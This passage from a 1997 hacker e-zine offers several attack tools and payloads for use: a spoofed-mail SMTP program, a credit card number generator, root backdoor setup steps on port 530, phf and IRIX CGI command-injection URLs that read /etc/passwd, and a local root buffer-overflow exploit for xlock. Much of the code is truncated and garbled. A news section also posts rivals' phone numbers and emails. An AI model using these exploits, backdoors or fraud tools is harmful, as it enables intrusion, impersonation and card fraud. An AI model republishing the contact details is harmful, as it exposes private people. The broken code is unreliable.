ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Fakemailing Techniques : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Fakemailing is old and very very easy to do. To use this simple fakemailing
program just make a file, such as letter.txt with the stuff you want to send
in it, like "Hey Bill! how's it going?" or whatever. Next compile the
fakemail.c using gcc -o sendfake sendfake.c ignore any warning messages.
Run the program using "sendfake" and follow the steps, simple as that =)
/**********************************************************/
/* SENDFAKE.C */
/* */
/* */
/* Author: asm@quantum.syspac.com */
/* */
/* To compile: gcc -o sendfake sendfake.c */
/* Usage : sendfake */
/* */
/**********************************************************/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
int s;
if ((hp=gethostbyname(hostname))==NULL) return(-1);
bzero(&sa, sizeof(sa));
bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length);
sa.sin_family = hp->h_addrtype;
sa.sin_port = htons((u_short)25);
do {
if(read(s, &c, 1)<1)
return(0);
if((c >= ' ') || (c <= 126))
if(to<MAXLEN-1)
buf[to++] = c;
} while (c != '\n');
buf[to] = '\0';
return(1);
}
int main(void)
{
char hostn[20];
char from[40];
char to[40];
char name[40];
char subject[60];
char passw[20];
char str[MAXLEN];
char buf[MAXLEN];
FILE *fp;
printf("\n");
printf("Welcome to sendfake! The BEST fake/anon mailer there is!\n");
printf("By asm@quantum.syspac.com\n");
printf("\n");
input("Host to fake mail from",hostn);
if((s=call_socket(hostn)) <0) {
perror("Connection error");
exit(1);
}
readln(buf);
gethostname(hostn,20);
sprintf(str, "HELO %s", hostn);
writeln(str);
readln(buf);
input("Fake email address fakemail is FROM",from);
sprintf(str, "MAIL FROM: <%s>",from);
writeln(str);
readln(buf);
do {
input("Send fake mail TO",to);
sprintf(str, "RCPT TO: <%s>",to);
writeln(str);
readln(buf);
*(buf+3) = 0;
if(atoi(buf) == 250) break; else printf("%s",buf+4);
} while(1);
input("Name of lamer getting the fake mail",name);
input("Subject of fake mail",subject);
writeln("DATA");
sprintf(str,"To: %s <%s>",name,to);
writeln(str);
if(strlen(subject)) {
sprintf(str, "Subject: %s", subject);
writeln(str);
}
do {
input("File to read and include in fake mail",str);
if(!strlen(str)) {
close(s);
exit(1);
}
if((fp = fopen(str,"rt")) == NULL) printf("Could not find file %s\n",
str);
else break;
} while(1);
while(fgets(str,MAXLEN,fp)) write(s, str, strlen(str));
writeln("\n.\n");
readln(buf);
writeln("QUIT\n");
printf("Sent!!!\n");
close(s);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Pascal Credit Card Generator Source : Lobster Guacamole
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
PROGRAM ccnum;
USES
Crt;
VAR
ccnum_count : Integer;
PROCEDURE program_init;
BEGIN
Randomize;
CheckBreak := False;
END;
PROCEDURE show_title;
BEGIN
ClrScr;
Writeln;
Writeln( 'CCNUM - Credit Card Number Generator.' );
Writeln( 'Written by Lobster Guacamole.' );
Writeln;
END;
PROCEDURE get_pwd;
VAR
program_pwd : String;
BEGIN
Writeln;
Write( 'Enter password>' );
Readln( program_pwd );
IF program_pwd <> 'a' THEN { If you changed the password on line 40, }
BEGIN { change it here, too. }
Writeln;
Writeln( 'Incorrect' );
Halt;
END;
END;
PROCEDURE make_ccnum;
VAR
ccnum_digits : ARRAY[ 1..16 ] OF Integer;
doub_odd_digits : ARRAY[ 1..8 ] OF Integer;
digit_count : Integer;
yn_choice : Char;
added_digits : Integer;
BEGIN
REPEAT
FOR digit_count := 5 TO 16 DO
BEGIN
ccnum_digits[ digit_count ] := Random(10);
END;
doub_odd_digits[1] := 2 * ccnum_digits[1];
IF doub_odd_digits[1] > 9 THEN
doub_odd_digits[1] := doub_odd_digits[1] - 9;
doub_odd_digits[2] := 2 * ccnum_digits[3];
IF doub_odd_digits[2] > 9 THEN
doub_odd_digits[2] := doub_odd_digits[2] - 9;
doub_odd_digits[3] := 2 * ccnum_digits[5];
IF doub_odd_digits[3] > 9 THEN
doub_odd_digits[3] := doub_odd_digits[3] - 9;
doub_odd_digits[4] := 2 * ccnum_digits[7];
IF doub_odd_digits[4] > 9 THEN
doub_odd_digits[4] := doub_odd_digits[4] - 9;
doub_odd_digits[5] := 2 * ccnum_digits[9];
IF doub_odd_digits[5] > 9 THEN
doub_odd_digits[5] := doub_odd_digits[5] - 9;
doub_odd_digits[6] := 2 * ccnum_digits[11];
IF doub_odd_digits[6] > 9 THEN
doub_odd_digits[6] := doub_odd_digits[6] - 9;
doub_odd_digits[7] := 2 * ccnum_digits[13];
IF doub_odd_digits[7] > 9 THEN
doub_odd_digits[7] := doub_odd_digits[7] - 9;
doub_odd_digits[8] := 2 * ccnum_digits[15];
IF doub_odd_digits[8] > 9 THEN
doub_odd_digits[8] := doub_odd_digits[8] - 9;
BEGIN
program_init;
show_title;
get_pwd;
FOR ccnum_count := 1 TO 10 DO make_ccnum;
END.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. in.courierd : backdoor on port 530 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
As root do the following (without the %'s ;]) to setup the backdoor.
--------------------------------------------------------------------
% cp /bin/bash /usr/sbin/in.courierd
% kill -HUP <pid> [replace the <pid> with the real pid]
exit;
ps -a;
whoami;
cd /;
You are root when you use the backdoor, and you are not seen or logged. The
last time I used this, it stayed up for 2 weeks =)
The above commands I have tested in Linux, I have heard that you have to reboot
a Sun for the new settings to take effect (shutdown -r now).
But hey! its only a prototype at the moment until I make it cool and alot
better =)
Have fun.
so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. UK Laws On Computer Misuse : Darkfool
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This part is actually useful info, not like Darkfools lesser works...Partially
edited by me, the original can be now found at www.sinnerz.com/bible.htm - T_K
Hey, this is an interesting little read. Please note it still can be quite
interesting even if you don't like in UK - Darkfool.
In plain English.
-----------------
{ This is the long title (header) of the Act and confirms what the act does
and applies to. }
TEXT:
{ This means that if you can get access to files which you shouldn't be
allowed to retrieve or read then you are committing a offence, this only
applies if the person in question has intent ( meaning they are doing it
on purpose, often referred to as hacking ) to carry this out. }
For the purposes of the above section the requisite knowledge is an intent
to cause a modification of the contents of any computer and by so doing
to impair the operation of any computer; to prevent or hinder access to
any program or data held in any computer; to impair the operation of any
such program or the reliability of any such data. The intent need not be
directed at any particular computer; any particular program or data or a
program or data of any particular kind; or any particular modification.
{ This basically means, if you have the intent and knowledge of breaking
into computers, without have to actually do it you can be liable to an
offence. }
For the purposes of the Criminal Damage Act 1971 a modification of the
contents of a computer shall not be regarded as damaging any computer or
computer storage medium unless its effect on that computer storage medium,
impairs its physical condition.
{ Meaning that you cannot be prosecuted for criminal damage whilst hacking
into a machine unless you cause physical damage i.e. on site hacking,
then taking a sledge hammer to the computer can be classed as criminal
damage but change the password for root login is not criminal damage,
unless you send the computer into high speed self destruct mode and
ruin one of the heads on the 50 gig duke box ? }
{ A lot of the next part of the document is about jurisdiction and some
technical mumbo jumbo }
{ This basically means that if they believe that you have the intent or
have broken into a system your not supposed to ( section 1 ) they can
come around your house and knock your door in, or, open it for them
nicely. }
{ This meaning, that if you have a conspiracy to break into a system you
can be extradited }
So, if your out there and in UK and didn't know that you were doing is most
probably illegal then keep your head down !
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. so1o Gets Busted By CERT : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken
pussy! and a cl000less one at that!@# Speadin' shit about stuff you dont know :
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
I've seen one of those logs that Modify had (now CERT have them too) and,
I'm sooooo dissapointed to say...
Let us look at the facts...Those that Hostile and his little lameassfuck sIn
wannabe haqr posse didn't even see :
-------------------------------------------------------------------------------
THE FACTS :
-------------------------------------------------------------------------------
GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd
And here is the phf query code set down by every text
I have ever read AND in phfscan.c which I would use if
I ever wanted to scan such sites for the phf hole :
GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
so1o.
There are alot of missing pieces, and alot of the data I base
my argument on originated from m0dify (see the letter to
IRT@TELIA.NET earlier) so I think I have more of an idea than
Hostile the cl00less lame gimpfuck wannabe haqr.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. CERT Advisory CA-97.13 : xlock vunerablity : Taken From Bugtraq
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Topic: Vulnerability in xlock
-------------------------------------------------------------------------------
The CERT Coordination Center has received reports that a buffer overflow
condition exists in some implementations of xlock. This vulnerability makes it
possible for local users (users with access to an account on the system) to
execute arbitrary programs as a privileged user.
-------------------------------------------------------------------------------
I. Description
Note that this problem is different from that discussed in CERT Advisory
CA-97.11.libXt.
II. Impact
III. Solution
1. Find and disable any copies of xlock that exist on your system and
that have the setuid or setgid bits set.
ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz
MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e
You can also obtain this version from mirror sites. A list of
these sites will be displayed if you are not able to access the
above archive due to load.
...........................................................................
Below is a list of the vendors who have provided information for this
advisory. We will update this appendix as we receive additional information.
If you do not see your vendor's name, the CERT/CC did not hear from that
vendor. Please contact the vendor directly.
FreeBSD, Inc.
=============
The xlockmore version we ship in our ports collection is vulnerable
in all shipped releases. The port in FreeBSD-current is fixed.
Solution is to install the latest xlockmore version (4.02).
Hewlett-Packard Company
=======================
We ship an suid root program vuelock that is based on xlock.
It does have the vulnerability.
The only workaround is to remove the executable, the patch is "in process".
IBM Corporation
===============
AIX is vulnerable to the conditions described in this advisory.
The following APARs will be released soon:
LINUX
=====
Red Hat:
Not vulnerable
Caldera:
Not vulnerable
Debian:
An updated package is on the Debian site
SuSE:
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock
NEC Corporation
===============
UX/4800 Not vulnerable for all versions.
EWS-UX/V(Rel4.2MP) Not vulnerable for all versions.
EWS-UX/V(Rel4.2) Not vulnerable for all versions.
UP-UX/V(Rel4.2MP) Not vulnerable for all versions.
The Open Group
==============
Publicly available software that was formerly distributed by the X Consortium -
Not vulnerable.
Solbourne
=========
Solbourne is not vulnerable to this attack.
-------------------------------------------------------------------------------
The CERT Coordination Center thanks David Hedley for reporting the original
problem and Kaleb Keithley at The Open Group for his support in the
development of this advisory.
-------------------------------------------------------------------------------
If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident Response
and Security Teams (see http://www.first.org/team-info/).
Email cert@cert.org
Fax +1 412-268-6989
Postal address
Using encryption
ftp://info.cert.org/pub/CERT_PGP.key
Getting security information
http://www.cert.org/
ftp://info.cert.org/pub/
CERT advisories and bulletins are also posted on the USENET newsgroup
comp.security.announce
cert-advisory-request@cert.org
SUBSCRIBE your-email-address
-------------------------------------------------------------------------------
* Registered U.S. Patent and Trademark Office.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Revision history
iQCVAwUBM3DOFnVP+x0t4w7BAQH9MwQAwULlCDTqDbW+CiS0/Z36BtGf6Eqzx43B
pEt72rQlQbw2AqRnHeq85dzVUB4eKmL0T//bGYyo0sCt+8nlFaS3cNYh0cyl3jdu
JPDVoNhWB7v2+8nHvAEDz2UdomNVaxXDFvAbZ9JvEk/Ex6aFiXtl4qXdjxtcC4ze
kGKLcu0+LzE=
=nF5B
-----END PGP SIGNATURE-----
------------------------------------------------------------------------------
The Exploit Code - not in the *ORIGINAL* CERT advisory ;] :
------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
if (argc > 1)
dfltOFFSET = atoi(argv[1]);
else printf("You can specify another offset as a parameter if you need...\n");
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + dfltOFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. IRiX WWW Server Bugs : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Number 1 :
----------
http://www.site.com/cgi-bin/wrap?/etc
...Lets you view the contents of the /etc/ directory, you can try others too..
Number 2 :
----------
http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the
cgi script isn't a trap. You can also execute some kind of remote shell using
webdist technique, but we are looking into it now...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9. Hacking Not-So-Electrical Items : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1 : A HaCk SaW
2 : CoMoFlAgUeD CLoThiNG
3 : a CoPPeR NaiL
4 : A hAmmER
5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte)
6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE
7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*)
8 : OnE RS232 CaBlE
FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE,
dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE
BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy
aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To
PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE!
WhEn ThE rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe
BeHiNd A bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute
d0Wn dA TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS
AnD RuN tHiS PrOgRam In Gw-BASiC...
ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW
AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe
a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt.
NeXt CHecK On YoUr LaPtOp WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT
ThEN uSe The CoPPeR nAiL to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The
TrEE, AnD ThE TrEE WiLL bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB
HaRd dRivE SPaCe)
TeEkAy.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Amnesty International Hacked : Article From cnet.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
http://www.news.com/News/Item/0,4,10135,00.html
By Janet Kornblum
April 28, 1997, 3:15 p.m. PT
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. //sToRm// Of sIn Rips Port Pro : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
DCCNewk : Chargen Flood? why not try like, SYN FLOOD? d0h..
Port Pro : Okay, original Port Pro is SHAREWARE, made by Blue Byte
Software, and it is SOOO obvious that //sToRm// just did a
little bit of hex editing, and B00oo00m! hes changed the
authors name and shit to his own! but ummm, because of his
EXTREME lameness, he didn't know how to change the program
name, the version and the general interface and look of the
program, what a LAME FUCK. I'm sure he will have Blue Byte
on his fucking ass with Copyright and shit. h0h0h0h0h0!@#
I doubt //sToRm// coded *ANYTHING* on that page,
as DrSpewfy is just shit, and DCCNewk is just like the DCC
Nuking code we put out in the CodeZero Technical Journal
Issue 2 :)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Digital Darkness Lives : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It looked as if the DD wouldn't bring out a magazine this month, but they
got a huge influx of submissions and live another day!@# if you want to submit
anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't shure.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. /home/sdr 0wned : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on
efnet have their shells) was playing with the permissions in his home directory
and he accidentally made the whole directory world readable, so then cold blood
and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and
were distributing the sdr.tar.gz in #hack using XDCC :)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Sendmail 8.8.4 Remote Is Out : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yep, its been confirmed, the sendmail 884 remote exploit for ALL OS's is now
out, there was some delay in r00t members getting the offsets needed for each
Operating System, but now the technique is complete, and many 8.8.4 systems
are vunerable. Sendmail 8.8.5 remote exploits are being looked into now.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. sIn inf0z Part 2 : The CodeZero
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-------------------------------------------------------------------------------
=-= w0wie!@# we g0t 2 n0w!! =-=
-------------------------------------------------------------------------------
Telephone : (206)454-7176
Email : evilchic@NWLINK.COM
-------------------------------------------------------------------------------
Alias : \\StOrM\\
Telephone : (816)453-8722
Email : storm@SINNERZ.COM
-------------------------------------------------------------------------------
aS wE PrOMiSeD LasT t1me! eXpect m0re s00n!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/05/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
